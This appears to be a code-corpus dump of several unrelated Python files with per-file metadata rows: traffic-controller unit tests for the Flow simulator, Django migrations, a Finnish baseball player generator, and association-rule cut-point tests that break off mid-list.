"MIT"
] | null | null | null | import unittest
from flow.core.experiment import SumoExperiment
from flow.core.params import SumoParams, EnvParams, InitialConfig, NetParams
from flow.core.vehicles import Vehicles
from flow.controllers.routing_controllers import ContinuousRouter
from flow.controllers.car_following_models import *
from setup_scripts import ring_road_exp_setup
class TestCFMController(unittest.TestCase):
"""
Tests that the CFM Controller returning mathematically accurate values.
"""
def setUp(self):
# add a few vehicles to the network using the requested model
# also make sure that the input params are what is expected
contr_params = \
{"k_d": 1, "k_v": 1, "k_c": 1, "d_des": 1, "v_des": 8,
"accel_max": 20, "decel_max": -5, "tau": 0, "dt": 0.1, "noise": 0}
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(CFMController, contr_params),
routing_controller=(ContinuousRouter, {}),
num_vehicles=5
)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(vehicles=vehicles)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def test_get_action(self):
self.env.reset()
ids = self.env.vehicles.get_ids()
test_headways = [5, 10, 15, 20, 25]
test_speeds = [5, 10, 5, 10, 5]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
self.env.vehicles.set_speed(veh_id, test_speeds[i])
requested_accel = [self.env.vehicles.get_acc_controller(
veh_id).get_action(self.env) for veh_id in ids]
expected_accel = [12, 2, 20, 12, 20]
np.testing.assert_array_almost_equal(requested_accel, expected_accel)
class TestBCMController(unittest.TestCase):
"""
Tests that the BCM Controller returning mathematically accurate values.
"""
def setUp(self):
# add a few vehicles to the network using the requested model
# also make sure that the input params are what is expected
contr_params = \
{"k_d": 1, "k_v": 1, "k_c": 1, "d_des": 1, "v_des": 8,
"accel_max": 15, "decel_max": -5, "tau": 0, "dt": 0.1, "noise": 0}
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(BCMController, contr_params),
routing_controller=(ContinuousRouter, {}),
num_vehicles=5
)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(vehicles=vehicles)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def test_get_action(self):
self.env.reset()
ids = self.env.vehicles.get_ids()
test_headways = [5, 10, 15, 20, 25]
test_speeds = [5, 10, 5, 10, 5]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
self.env.vehicles.set_speed(veh_id, test_speeds[i])
requested_accel = [self.env.vehicles.get_acc_controller(
veh_id).get_action(self.env) for veh_id in ids]
expected_accel = [-12, -7, 15, -7, 13]
np.testing.assert_array_almost_equal(requested_accel, expected_accel)
class TestOVMController(unittest.TestCase):
"""
Tests that the OVM Controller returning mathematically accurate values.
"""
def setUp(self):
# add a few vehicles to the network using the requested model
# also make sure that the input params are what is expected
contr_params = \
{"alpha": 1, "beta": 1, "h_st": 2, "h_go": 15, "v_max": 30,
"accel_max": 15, "decel_max": -5, "tau": 0, "dt": 0.1, "noise": 0}
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(OVMController, contr_params),
routing_controller=(ContinuousRouter, {}),
num_vehicles=5
)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(vehicles=vehicles)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def test_get_action(self):
self.env.reset()
ids = self.env.vehicles.get_ids()
test_headways = [0, 10, 5, 5, 5]
test_speeds = [5, 10, 5, 10, 5]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
self.env.vehicles.set_speed(veh_id, test_speeds[i])
requested_accel = [self.env.vehicles.get_acc_controller(
veh_id).get_action(self.env) for veh_id in ids]
expected_accel = [0, 5.319073, 3.772339, -5., -1.227661]
np.testing.assert_array_almost_equal(requested_accel, expected_accel)
class TestLinearOVM(unittest.TestCase):
"""
Tests that the Linear OVM Controller returning mathematically accurate
values.
"""
def setUp(self):
# add a few vehicles to the network using the requested model
# also make sure that the input params are what is expected
contr_params = \
{"v_max": 30, "accel_max": 15, "decel_max": -5, "adaptation": 0.65,
"h_st": 5, "tau": 0, "dt": 0.1, "noise": 0}
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(LinearOVM, contr_params),
routing_controller=(ContinuousRouter, {}),
num_vehicles=5
)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(vehicles=vehicles)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def test_get_action(self):
self.env.reset()
ids = self.env.vehicles.get_ids()
test_headways = [5, 10, 10, 15, 0]
test_speeds = [5, 10, 5, 10, 5]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
self.env.vehicles.set_speed(veh_id, test_speeds[i])
requested_accel = [self.env.vehicles.get_acc_controller(
veh_id).get_action(self.env) for veh_id in ids]
expected_accel = [-5., -2.392308, 5.3, 10.6, -5.]
np.testing.assert_array_almost_equal(requested_accel, expected_accel)
class TestIDMController(unittest.TestCase):
"""
Tests that the IDM Controller returning mathematically accurate values.
"""
def setUp(self):
# add a few vehicles to the network using the requested model
# also make sure that the input params are what is expected
contr_params = {"v0": 30, "T": 1, "a": 1, "b": 1.5, "delta": 4, "s0": 2,
"s1": 0, "decel_max": -5, "dt": 0.1, "noise": 0}
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(IDMController, contr_params),
routing_controller=(ContinuousRouter, {}),
num_vehicles=5
)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(vehicles=vehicles)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def test_get_action(self):
self.env.reset()
ids = self.env.vehicles.get_ids()
test_headways = [10, 20, 30, 40, 50]
test_speeds = [5, 10, 5, 10, 5]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
self.env.vehicles.set_speed(veh_id, test_speeds[i])
requested_accel = [self.env.vehicles.get_acc_controller(
veh_id).get_action(self.env) for veh_id in ids]
expected_accel = \
[0.959228, -1.638757, 0.994784, 0.331051, 0.979628]
np.testing.assert_array_almost_equal(requested_accel, expected_accel)
# set the perceived headway to zero
test_headways = [0, 0, 0, 0, 0]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
# make sure the controller doesn't return a ZeroDivisionError when the
# headway is zero
[self.env.vehicles.get_acc_controller(veh_id).get_action(self.env)
for veh_id in ids]
class TestInstantaneousFailsafe(unittest.TestCase):
"""
Tests that the instantaneous failsafe of the base acceleration controller
does not allow vehicles to crash under situations where they otherwise
would. This is tested on two crash-prone controllers: OVM and LinearOVM
"""
def setUp_failsafe(self, vehicles):
additional_env_params = {"target_velocity": 8, "max-deacc": 3,
"max-acc": 3}
env_params = EnvParams(additional_params=additional_env_params,
longitudinal_fail_safe="instantaneous")
additional_net_params = {"length": 100, "lanes": 1, "speed_limit": 30,
"resolution": 40}
net_params = NetParams(additional_params=additional_net_params)
initial_config = InitialConfig(bunching=10)
# create the environment and scenario classes for a ring road
env, scenario = ring_road_exp_setup(vehicles=vehicles,
env_params=env_params,
net_params=net_params,
initial_config=initial_config)
# instantiate an experiment class
self.exp = SumoExperiment(env, scenario)
def tearDown_failsafe(self):
# free data used by the class
self.exp = None
def test_no_crash_OVM(self):
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(OVMController, {}),
routing_controller=(ContinuousRouter, {}),
num_vehicles=10
)
self.setUp_failsafe(vehicles=vehicles)
# run the experiment, see if it fails
self.exp.run(1, 200)
self.tearDown_failsafe()
def test_no_crash_LinearOVM(self):
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(LinearOVM, {}),
routing_controller=(ContinuousRouter, {}),
num_vehicles=10
)
self.setUp_failsafe(vehicles=vehicles)
# run the experiment, see if it fails
self.exp.run(1, 200)
self.tearDown_failsafe()
class TestSafeVelocityFailsafe(TestInstantaneousFailsafe):
"""
Tests that the safe velocity failsafe of the base acceleration controller
does not fail under extreme conditions.
"""
def setUp_failsafe(self, vehicles):
additional_env_params = {"target_velocity": 8, "max-deacc": 3,
"max-acc": 3}
env_params = EnvParams(additional_params=additional_env_params,
longitudinal_fail_safe="safe_velocity")
additional_net_params = {"length": 100, "lanes": 1, "speed_limit": 30,
"resolution": 40}
net_params = NetParams(additional_params=additional_net_params)
initial_config = InitialConfig(bunching=10)
# create the environment and scenario classes for a ring road
env, scenario = ring_road_exp_setup(vehicles=vehicles,
env_params=env_params,
net_params=net_params,
initial_config=initial_config)
# instantiate an experiment class
self.exp = SumoExperiment(env, scenario)
class TestStaticLaneChanger(unittest.TestCase):
"""
Makes sure that vehicles with a static lane-changing controller do not
change lanes.
"""
def setUp(self):
# add an extra lane to the ring road network
additional_net_params = {"length": 230, "lanes": 2, "speed_limit": 30,
"resolution": 40}
net_params = NetParams(additional_params=additional_net_params)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(net_params=net_params)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def runTest(self):
ids = self.env.vehicles.get_ids()
# run the experiment for a few iterations and collect the lane index
# for vehicles
lanes = [self.env.vehicles.get_lane(veh_id) for veh_id in ids]
for i in range(5):
self.env._step(rl_actions=[])
lanes += [self.env.vehicles.get_lane(veh_id) for veh_id in ids]
# set the timer as very high and reset (the timer used to cause bugs at
# the beginning of a new run for this controller)
self.env.timer = 10000
self.env.reset()
# run the experiment for a few more iterations and collect the lane
# index for vehicles
lanes = [self.env.vehicles.get_lane(veh_id) for veh_id in ids]
for i in range(5):
self.env._step(rl_actions=[])
lanes += [self.env.vehicles.get_lane(veh_id) for veh_id in ids]
# assert that all lane indices are zero
self.assertEqual(sum(np.array(lanes)), 0)
class TestContinuousRouter(unittest.TestCase):
"""
Tests that the continuous router operates properly if there is no need to
reroute, and if there is a need to do so.
"""
def setUp(self):
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup()
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def runTest(self):
veh_id = self.env.vehicles.get_ids()[0]
# set the perceived route of the vehicle
self.env.vehicles.set_route(veh_id, ["bottom", "right", "top", "left"])
# set the perceived edge of the vehicle at the beginning of its route
self.env.vehicles.set_edge(veh_id, "bottom")
# assert that the controller is returning a None value
requested_route = self.env.vehicles.get_routing_controller(
veh_id).choose_route(self.env)
self.assertIsNone(requested_route)
# set the perceived edge of the vehicle at the middle of its route
self.env.vehicles.set_edge(veh_id, "right")
# assert that the controller is returning a None value
requested_route = self.env.vehicles.get_routing_controller(
veh_id).choose_route(self.env)
self.assertIsNone(requested_route)
# set the perceived edge of the vehicle at the end of its route
self.env.vehicles.set_edge(veh_id, "left")
# assert that the controller is returning a list of edges starting at
# this link and then containing the route of the link ahead of it
requested_route = self.env.vehicles.get_routing_controller(
veh_id).choose_route(self.env)
expected_route = ["left", "bottom", "right", "top"]
self.assertSequenceEqual(requested_route, expected_route)
if __name__ == '__main__':
unittest.main()
| 35.480088 | 80 | 0.621999 | 2,041 | 16,037 | 4.712396 | 0.136208 | 0.053857 | 0.054585 | 0.03743 | 0.804221 | 0.781659 | 0.774381 | 0.768039 | 0.758474 | 0.751508 | 0 | 0.025999 | 0.285278 | 16,037 | 451 | 81 | 35.558758 | 0.813122 | 0.221176 | 0 | 0.730159 | 0 | 0 | 0.040085 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 1 | 0.103175 | false | 0 | 0.027778 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e310b1c11b7b561bcd3ace50103b82d456e470ea | 247 | py | Python | timemachines/skaters/nproph/allnprophetskaters.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 253 | 2021-01-08T17:33:30.000Z | 2022-03-21T17:32:36.000Z | timemachines/skaters/nproph/allnprophetskaters.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 65 | 2021-01-20T16:43:35.000Z | 2022-03-30T19:07:22.000Z | timemachines/skaters/nproph/allnprophetskaters.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 28 | 2021-02-04T14:58:30.000Z | 2022-01-17T04:35:17.000Z | from timemachines.skaters.nproph.nprophetskaters import NPROPHET_UNIVARIATE_SKATERS
from timemachines.skaters.nproph.nprophskaterscomposed import NPROPHET_SKATERS_COMPOSED
NPROPHET_SKATERS = NPROPHET_UNIVARIATE_SKATERS + NPROPHET_SKATERS_COMPOSED | 61.75 | 87 | 0.91498 | 26 | 247 | 8.346154 | 0.384615 | 0.207373 | 0.211982 | 0.267281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 247 | 4 | 88 | 61.75 | 0.92735 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
477403a44ff39f469ed37fdb99910aa01763e27a | 2,649 | py | Python | channels/migrations/0018_add_post_and_comment_fields.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 12 | 2017-09-27T21:23:27.000Z | 2020-12-25T04:31:30.000Z | channels/migrations/0018_add_post_and_comment_fields.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 3,293 | 2017-06-30T18:16:01.000Z | 2022-03-31T18:01:34.000Z | channels/migrations/0018_add_post_and_comment_fields.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 1 | 2020-04-13T12:19:57.000Z | 2020-04-13T12:19:57.000Z | # Generated by Django 2.1.5 on 2019-01-18 19:04
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("channels", "0017_remove_unique"),
]
operations = [
migrations.AddField(
model_name="comment",
name="author",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="comment", name="deleted", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="comment", name="edited", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="comment", name="removed", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="comment", name="score", field=models.BigIntegerField(null=True)
),
migrations.AddField(
model_name="comment", name="text", field=models.TextField(null=True)
),
migrations.AddField(
model_name="post",
name="author",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="post", name="deleted", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="post", name="edited", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="post",
name="num_comments",
field=models.BigIntegerField(null=True),
),
migrations.AddField(
model_name="post", name="removed", field=models.BooleanField(null=True)
),
migrations.AddField(
model_name="post", name="score", field=models.BigIntegerField(null=True)
),
migrations.AddField(
model_name="post", name="text", field=models.TextField(null=True)
),
migrations.AddField(
model_name="post",
name="title",
field=models.CharField(max_length=300, null=True),
),
migrations.AddField(
model_name="post",
name="url",
field=models.URLField(max_length=2048, null=True),
),
]
| 33.1125 | 87 | 0.572291 | 256 | 2,649 | 5.808594 | 0.246094 | 0.181574 | 0.232011 | 0.27236 | 0.768662 | 0.768662 | 0.738399 | 0.738399 | 0.704775 | 0.704775 | 0 | 0.014169 | 0.307286 | 2,649 | 79 | 88 | 33.531646 | 0.796185 | 0.016988 | 0 | 0.630137 | 1 | 0 | 0.074558 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041096 | 0 | 0.082192 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
47ff264ac5ccd9a71d40e31f962a80ca71a13c27 | 2,229 | py | Python | web/transiq/restapi/migrations/0023_auto_20181029_1058.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | null | null | null | web/transiq/restapi/migrations/0023_auto_20181029_1058.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | 14 | 2020-06-05T23:06:45.000Z | 2022-03-12T00:00:18.000Z | web/transiq/restapi/migrations/0023_auto_20181029_1058.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.0.5 on 2018-10-29 10:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('restapi', '0022_auto_20181003_1919'),
]
operations = [
migrations.AlterField(
model_name='bookingstatuses',
name='status',
field=models.CharField(choices=[('confirmed', 'Confirmed'), ('loaded', 'Loaded'), ('lr_generated', 'Lr Generated'), ('advance_paid', 'Advance Paid'), ('unloaded', 'Unloaded'), ('pod_uploaded', 'PoD Uploaded'), ('pod_verified', 'PoD Verified'), ('invoice_raised', 'Invoice Raised'), ('invoice_confirmed', 'Invoice Confirmed'), ('balance_paid', 'Balance Paid'), ('party_invoice_sent', 'Party Invoice Sent'), ('inward_followup_completed', 'Inward Followup Completed'), ('complete', 'Complete')], default='confirmed', max_length=35, null=True),
),
migrations.AlterField(
model_name='bookingstatusesmapping',
name='booking_stage',
field=models.CharField(choices=[('in_progress', 'In Progress'), ('done', 'Done'), ('reverted', 'Reverted'), ('escalated', 'Escalated')], default='in_progress', max_length=15, null=True),
),
migrations.AlterField(
model_name='historicalbookingstatuses',
name='status',
field=models.CharField(choices=[('confirmed', 'Confirmed'), ('loaded', 'Loaded'), ('lr_generated', 'Lr Generated'), ('advance_paid', 'Advance Paid'), ('unloaded', 'Unloaded'), ('pod_uploaded', 'PoD Uploaded'), ('pod_verified', 'PoD Verified'), ('invoice_raised', 'Invoice Raised'), ('invoice_confirmed', 'Invoice Confirmed'), ('balance_paid', 'Balance Paid'), ('party_invoice_sent', 'Party Invoice Sent'), ('inward_followup_completed', 'Inward Followup Completed'), ('complete', 'Complete')], default='confirmed', max_length=35, null=True),
),
migrations.AlterField(
model_name='historicalbookingstatusesmapping',
name='booking_stage',
field=models.CharField(choices=[('in_progress', 'In Progress'), ('done', 'Done'), ('reverted', 'Reverted'), ('escalated', 'Escalated')], default='in_progress', max_length=15, null=True),
),
]
| 65.558824 | 552 | 0.646478 | 221 | 2,229 | 6.343891 | 0.307692 | 0.042796 | 0.071327 | 0.082739 | 0.805278 | 0.805278 | 0.784593 | 0.784593 | 0.784593 | 0.784593 | 0 | 0.021115 | 0.171377 | 2,229 | 33 | 553 | 67.545455 | 0.737953 | 0.020188 | 0 | 0.592593 | 1 | 0 | 0.453712 | 0.069661 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9a1a5c24cda44b9419993cc8a494ca2ca3d040ee | 2,193 | py | Python | pesis/pesis_old/engine/create_players.py | paulamh/pesis | c5ab10a96fc78c761c8c642f316c68acfb8a6892 | [
"BSD-2-Clause"
] | null | null | null | pesis/pesis_old/engine/create_players.py | paulamh/pesis | c5ab10a96fc78c761c8c642f316c68acfb8a6892 | [
"BSD-2-Clause"
] | null | null | null | pesis/pesis_old/engine/create_players.py | paulamh/pesis | c5ab10a96fc78c761c8c642f316c68acfb8a6892 | [
"BSD-2-Clause"
] | null | null | null | from ..objects import Player
from ..utils import dgv, prc_choice, rand_pick
def create_players(level_multiplier=1.):
ps = []; lm = level_multiplier; nu = 2.
gens = ('perusvarma','tulokas','konkari')
ins = ('lyöjä','etenijä','yleispelaaja')
outs = ('koppari','sieppari','polttaja','lukkari')
ps.append(Player('Player A', dgv(14,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player B', dgv(14,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player C', dgv(13,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player D', dgv(12,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player E', dgv(12,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player F', dgv(10,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player G', dgv(10,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player H', dgv(10,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player I', dgv(10,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player J', dgv(8,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player K', dgv(8,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player L', dgv(6,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player M', dgv(6,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player N', dgv(4,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
ps.append(Player('Player O', dgv(4,1)*lm, nu, rand_pick(gens),
rand_pick(ins), rand_pick(outs))
return ps
| 53.487805 | 67 | 0.566803 | 324 | 2,193 | 3.682099 | 0.175926 | 0.308466 | 0.176027 | 0.251467 | 0.791282 | 0.791282 | 0.791282 | 0.791282 | 0.791282 | 0.791282 | 0 | 0.025418 | 0.264478 | 2,193 | 40 | 68 | 54.825 | 0.714197 | 0 | 0 | 0.394737 | 0 | 0 | 0.090328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052632 | null | null | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7beb2c91b457cb0c558c1a7c46443d99172775ce | 140 | py | Python | zvt/domain/misc/__init__.py | Evergreen2020/zvt | 446a2512d716a38a12164b6d4468a6c9de01b986 | [
"MIT"
] | 6 | 2020-09-03T10:02:00.000Z | 2021-02-04T02:51:47.000Z | zvt/domain/misc/__init__.py | Evergreen2020/zvt | 446a2512d716a38a12164b6d4468a6c9de01b986 | [
"MIT"
] | 2 | 2019-12-20T13:12:30.000Z | 2020-01-03T06:24:30.000Z | zvt/domain/misc/__init__.py | Evergreen2020/zvt | 446a2512d716a38a12164b6d4468a6c9de01b986 | [
"MIT"
] | 2 | 2020-07-08T04:15:40.000Z | 2021-06-08T08:51:31.000Z | # -*- coding: utf-8 -*-
from zvt.domain.misc.holder import *
from zvt.domain.misc.money_flow import *
from zvt.domain.misc.overall import *
| 28 | 40 | 0.728571 | 22 | 140 | 4.590909 | 0.545455 | 0.207921 | 0.386139 | 0.504951 | 0.455446 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00813 | 0.121429 | 140 | 4 | 41 | 35 | 0.813008 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
d0385067e14cd963a9ed6c7d8d1474cf6d868a11 | 7,057 | py | Python | tests/test_cut_point.py | zStupan/NiaARM | 3ade6c5f89a22da7f1e7309cb4fec227bb913e6b | [
"MIT"
] | null | null | null | tests/test_cut_point.py | zStupan/NiaARM | 3ade6c5f89a22da7f1e7309cb4fec227bb913e6b | [
"MIT"
] | 14 | 2022-03-02T07:38:34.000Z | 2022-03-15T11:18:50.000Z | tests/test_cut_point.py | zStupan/NiaARM | 3ade6c5f89a22da7f1e7309cb4fec227bb913e6b | [
"MIT"
] | 1 | 2022-03-01T14:41:07.000Z | 2022-03-01T14:41:07.000Z | from unittest import TestCase
from niaarm.niaarm import NiaARM, _cut_point
from niaarm.feature import Feature
from niaarm.dataset import Dataset
import os
# The basic test for checking the identification of the appropriate cut point of association rule.
class TestCutPoint(TestCase):
# let's borrow a test case from Wikipedia:
# https://en.wikipedia.org/wiki/Lift_(data_mining)
def setUp(self):
data = Dataset(os.path.join(os.path.dirname(__file__), 'test_data', 'wiki_test_case.csv'))
self.features = data.features
self.oper = NiaARM(data.dimension, data.features, data.transactions, ('support',))
def test_cut_pointA(self):
sol = [0.98328107, 0.93655004, 0.6860223, 0.78527931, 0.96291945, 0.18117294, 0.50567635, 0.33333333]
cut_value = sol[len(sol) - 1]
new_sol = sol[:-1]
cut = _cut_point(cut_value, len(self.features))
rule = self.oper.build_rule(new_sol)
# get antecedent and consequent of rule
antecedent = rule[:cut]
consequent = rule[cut:]
self.assertEqual(cut_value, 0.33333333)
self.assertEqual(new_sol, [0.98328107, 0.93655004, 0.6860223, 0.78527931, 0.96291945, 0.18117294, 0.50567635])
self.assertEqual(cut, 1)
self.assertEqual(antecedent, [Feature('Feat1', 'cat', categories=['B'])])
self.assertEqual(consequent, [None])
class TestCutPointB(TestCase):
def setUp(self):
data = Dataset(os.path.join(os.path.dirname(__file__), 'test_data', 'Abalone.csv'))
self.features = data.features
self.oper = NiaARM(data.dimension, data.features, data.transactions, ('support',))
def test_cut_pointB(self):
sol = [
0.35841534,
0.15056955,
0.57296633,
0.25275099,
0.1311689,
0.48081366,
0.86191609,
0.0,
0.4988256,
1.0,
0.23,
0.15337635,
0.91438008,
0.24168367,
0.1185402,
0.81325209,
0.67415024,
0.59137232,
0.1794402,
0.48980977,
0.13287764,
0.63728572,
0.3163273,
0.37061311,
0.52579599,
0.7206465,
0.72623934,
0.0,
0.57660376,
0.0694041,
0.35173438,
0.09158622,
0.74415574,
0.56159659,
0.49068101,
0.33333333]
new_sol_a = [
0.35841534,
0.15056955,
0.57296633,
0.25275099,
0.1311689,
0.48081366,
0.86191609,
0.0,
0.4988256,
1.0,
0.23,
0.15337635,
0.91438008,
0.24168367,
0.1185402,
0.81325209,
0.67415024,
0.59137232,
0.1794402,
0.48980977,
0.13287764,
0.63728572,
0.3163273,
0.37061311,
0.52579599,
0.7206465,
0.72623934,
0.0,
0.57660376,
0.0694041,
0.35173438,
0.09158622,
0.74415574,
0.56159659,
0.49068101]
cut_value = sol[len(sol) - 1]
new_sol = sol[:-1]
cut = _cut_point(cut_value, len(self.features))
rule = self.oper.build_rule(new_sol)
# get antecedent and consequent of rule
antecedent = rule[:cut]
consequent = rule[cut:]
self.assertEqual(cut_value, 0.33333333)
self.assertEqual(new_sol, new_sol_a)
self.assertEqual(cut, 2)
self.assertEqual(antecedent, [Feature('Length', 'float', min_val=0.2620357326, max_val=0.4989950842),
Feature('Height', 'float', min_val=0.5636729279999999, max_val=1.13)])
self.assertEqual(consequent, [None, None, None, None,
Feature('Diameter', 'float', 0.34108412769999996, 0.56784007355),
Feature('Sex', 'cat', categories=['I']),
Feature('Viscera weight', 'float', 0.13678483190000001, 0.44964727704)])
def test_cut_pointC(self):
sol = [
0.35841534,
0.15056955,
0.57296633,
0.25275099,
0.1311689,
0.48081366,
0.86191609,
0.0,
0.4988256,
1.0,
0.23,
0.15337635,
0.91438008,
0.24168367,
0.1185402,
0.81325209,
0.67415024,
0.59137232,
0.1794402,
0.48980977,
0.13287764,
0.63728572,
0.3163273,
0.37061311,
0.52579599,
0.7206465,
0.72623934,
0.0,
0.57660376,
0.0694041,
0.35173438,
0.09158622,
0.74415574,
0.56159659,
0.49068101,
0.53333333]
new_sol_a = [
0.35841534,
0.15056955,
0.57296633,
0.25275099,
0.1311689,
0.48081366,
0.86191609,
0.0,
0.4988256,
1.0,
0.23,
0.15337635,
0.91438008,
0.24168367,
0.1185402,
0.81325209,
0.67415024,
0.59137232,
0.1794402,
